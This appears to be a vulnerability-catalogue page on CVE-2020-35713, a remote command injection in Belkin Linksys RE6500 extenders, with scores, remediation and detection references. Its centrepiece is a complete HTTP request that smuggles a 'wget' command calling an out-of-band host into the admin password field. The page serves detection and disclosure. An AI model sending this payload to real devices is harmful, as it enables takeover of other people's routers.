🔙 목록으로 돌아가기

CVE-2020-35713: Belkin Linksys RE6500 <1.0.012.001 - Remote Command Execution

TitleBelkin Linksys RE6500 <1.0.012.001 - Remote Command Execution
Authorgy741
SeverityCritical
ImpactSuccessful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device.
RemediationUpdate the Belkin Linksys RE6500 firmware to version 1.0.012.001 or later.
CVSS Score9.8
EPSS Score0.9275
CVE IDCVE-2020-35713
CWE IDCWE-78
Tags cve cve2020 linksys rce oast router vkev vuln

🔍 Vulnerability Description

Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page.

🌐 HTTP Request

POST /goform/setSysAdm HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.8
Connection: close
Content-Length: 138
Accept: */*
Origin: http://www.victim.com
Referer: http://www.victim.com/login.shtml
Accept-Encoding: gzip

admuser=admin&admpass=;wget http://d5jott9le0o3101mbdhgxwyk1xcr3fbih.oast.pro;&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-35713.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-35713.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A